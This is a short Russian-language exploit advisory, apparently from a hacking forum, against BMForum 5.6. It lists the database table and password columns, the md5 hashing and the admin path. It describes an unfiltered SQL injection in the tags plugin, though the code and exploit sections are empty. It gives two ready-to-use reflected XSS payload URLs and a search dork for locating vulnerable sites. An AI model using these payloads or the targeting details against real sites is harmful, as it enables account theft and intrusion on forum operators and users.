Офф.сайт: www.bmforum.com
Префикс таблиц бд: bmb_
Табличка: bmb_userlist
Клонки: username,pwd
Алгоритм шифрования: md5($pass)
Админка: http://localhost/admin.php

[SQL Injection]

Бага в плагине тегов.

Сценарий /plugins/tags.php

уязвимый код:

Из кода видно то что переменная $tagname передаётся без фильтрации на основе этого мы можем провести SQL-Иньекцию.

Условие: magic_quotes_gpc = Off

Эксплойт:

[XSS Passive]

http://localhost/[installdir]/index.php?cateid='><script%20%0a%0d>alert(/xss/)%3B</script>
http://localhost/[installdir]/post.php?forumid=2&type="><script%20%0a%0d>alert(/xss/)%3B</script>

Поиск:

Powered by BMForum 2007 5.6

(c) ~!Dok_tOR!~